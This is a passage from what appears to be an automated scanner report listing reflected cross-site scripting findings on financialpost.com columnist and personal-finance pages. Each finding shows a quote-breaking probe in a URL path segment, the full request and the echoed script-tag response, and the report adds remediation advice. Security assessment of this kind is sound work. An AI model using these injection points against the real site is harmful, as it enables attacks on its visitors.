Expires: Sun, 19 Dec 2010 03:12:54 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:54 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 37601


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/opinion/columnists4ed13';43d2ce6bccf/jamie-golombek;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=opinion;kw=columnists4ed13';43d2ce6bccf;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=44833350?">
...[SNIP]...

1.231. http://www.financialpost.com/opinion/columnists/jamie-golombek.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /opinion/columnists/jamie-golombek.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b393c'%3b95d66bbad15 was submitted in the REST URL parameter 3. This input was echoed as b393c';95d66bbad15 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /opinion/columnists/b393c'%3b95d66bbad15 HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:13:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:13:02 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44222


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/opinion/columnists/b393c';95d66bbad15/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=opinion;kw=columnists;kw=b393c';95d66bbad15;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=66179315?">
...[SNIP]...

1.232. http://www.financialpost.com/opinion/columnists/jonathan-chevreau.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /opinion/columnists/jonathan-chevreau.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a8854'%3b3c5e10ffaf8 was submitted in the REST URL parameter 1. This input was echoed as a8854';3c5e10ffaf8 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /opiniona8854'%3b3c5e10ffaf8/columnists/jonathan-chevreau.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:12:32 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:32 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43512


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/opiniona8854';3c5e10ffaf8/columnists/jonathan-chevreau;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=opiniona8854';3c5e10ffaf8;kw=columnists;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=65118957?
...[SNIP]...

1.233. http://www.financialpost.com/opinion/columnists/jonathan-chevreau.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /opinion/columnists/jonathan-chevreau.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1ca10'%3bd81b1ae580f was submitted in the REST URL parameter 2. This input was echoed as 1ca10';d81b1ae580f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /opinion/columnists1ca10'%3bd81b1ae580f/jonathan-chevreau.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:12:37 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:37 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 37632


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/opinion/columnists1ca10';d81b1ae580f/jonathan-chevreau;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=opinion;kw=columnists1ca10';d81b1ae580f;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=60808406?">
...[SNIP]...

1.234. http://www.financialpost.com/opinion/columnists/jonathan-chevreau.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /opinion/columnists/jonathan-chevreau.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f1e72'%3bc945c59c0e9 was submitted in the REST URL parameter 3. This input was echoed as f1e72';c945c59c0e9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /opinion/columnists/f1e72'%3bc945c59c0e9 HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:12:44 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:44 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 37558


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/opinion/columnists/f1e72';c945c59c0e9/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=opinion;kw=columnists;kw=f1e72';c945c59c0e9;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=66901991?">
...[SNIP]...

1.235. http://www.financialpost.com/opinion/columnists/peter-foster.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /opinion/columnists/peter-foster.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c8d26'%3b3b9f28c8209 was submitted in the REST URL parameter 1. This input was echoed as c8d26';3b9f28c8209 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /opinionc8d26'%3b3b9f28c8209/columnists/peter-foster.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:12:55 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:55 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44282


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/opinionc8d26';3b9f28c8209/columnists/peter-foster;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=opinionc8d26';3b9f28c8209;kw=columnists;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=98951316?">
...[SNIP]...

1.236. http://www.financialpost.com/opinion/columnists/peter-foster.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /opinion/columnists/peter-foster.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 71174'%3b881fe5fc1ca was submitted in the REST URL parameter 2. This input was echoed as 71174';881fe5fc1ca in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /opinion/columnists71174'%3b881fe5fc1ca/peter-foster.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:13:04 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:13:04 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 37582


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/opinion/columnists71174';881fe5fc1ca/peter-foster;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=opinion;kw=columnists71174';881fe5fc1ca;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=32185690?">
...[SNIP]...

1.237. http://www.financialpost.com/opinion/columnists/peter-foster.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /opinion/columnists/peter-foster.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f7ce7'%3b6e16cbc7aac was submitted in the REST URL parameter 3. This input was echoed as f7ce7';6e16cbc7aac in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /opinion/columnists/f7ce7'%3b6e16cbc7aac HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:13:16 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:13:16 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 37558


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/opinion/columnists/f7ce7';6e16cbc7aac/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=opinion;kw=columnists;kw=f7ce7';6e16cbc7aac;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=46235504?">
...[SNIP]...

1.238. http://www.financialpost.com/opinion/columnists/terence-corcoran.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /opinion/columnists/terence-corcoran.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c0c9f'%3bcdf561736ea was submitted in the REST URL parameter 1. This input was echoed as c0c9f';cdf561736ea in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /opinionc0c9f'%3bcdf561736ea/columnists/terence-corcoran.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:12:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:25 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43502


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/opinionc0c9f';cdf561736ea/columnists/terence-corcoran;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=opinionc0c9f';cdf561736ea;kw=columnists;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=49307214?"
...[SNIP]...

1.239. http://www.financialpost.com/opinion/columnists/terence-corcoran.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /opinion/columnists/terence-corcoran.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8e6c6'%3bb941a57f648 was submitted in the REST URL parameter 2. This input was echoed as 8e6c6';b941a57f648 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /opinion/columnists8e6c6'%3bb941a57f648/terence-corcoran.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:12:29 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:29 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43466


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/opinion/columnists8e6c6';b941a57f648/terence-corcoran;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=opinion;kw=columnists8e6c6';b941a57f648;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=44994617?">
...[SNIP]...

1.240. http://www.financialpost.com/opinion/columnists/terence-corcoran.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /opinion/columnists/terence-corcoran.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 79ea8'%3b6fc2681cae2 was submitted in the REST URL parameter 3. This input was echoed as 79ea8';6fc2681cae2 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /opinion/columnists/79ea8'%3b6fc2681cae2 HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:12:35 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 37558


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/opinion/columnists/79ea8';6fc2681cae2/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=opinion;kw=columnists;kw=79ea8';6fc2681cae2;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=96826146?">
...[SNIP]...

1.241. http://www.financialpost.com/opinion/columnists/william-hanley.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /opinion/columnists/william-hanley.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1008f'%3b2d6e85acc6d was submitted in the REST URL parameter 1. This input was echoed as 1008f';2d6e85acc6d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /opinion1008f'%3b2d6e85acc6d/columnists/william-hanley.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:12:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:58 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43481


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/opinion1008f';2d6e85acc6d/columnists/william-hanley;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=opinion1008f';2d6e85acc6d;kw=columnists;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=20197904?">
...[SNIP]...

1.242. http://www.financialpost.com/opinion/columnists/william-hanley.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /opinion/columnists/william-hanley.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ae8cb'%3b2ecc1657740 was submitted in the REST URL parameter 2. This input was echoed as ae8cb';2ecc1657740 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /opinion/columnistsae8cb'%3b2ecc1657740/william-hanley.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:13:05 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:13:05 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43445


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/opinion/columnistsae8cb';2ecc1657740/william-hanley;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=opinion;kw=columnistsae8cb';2ecc1657740;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=32871669?">
...[SNIP]...

1.243. http://www.financialpost.com/opinion/columnists/william-hanley.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /opinion/columnists/william-hanley.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3cf85'%3b041ad7667b4 was submitted in the REST URL parameter 3. This input was echoed as 3cf85';041ad7667b4 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /opinion/columnists/3cf85'%3b041ad7667b4 HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:13:23 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:13:23 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43401


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/opinion/columnists/3cf85';041ad7667b4/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=opinion;kw=columnists;kw=3cf85';041ad7667b4;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=58312868?">
...[SNIP]...

1.244. http://www.financialpost.com/personal-finance/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /personal-finance/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 84eb2'%3b2bb55a25061 was submitted in the REST URL parameter 1. This input was echoed as 84eb2';2bb55a25061 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

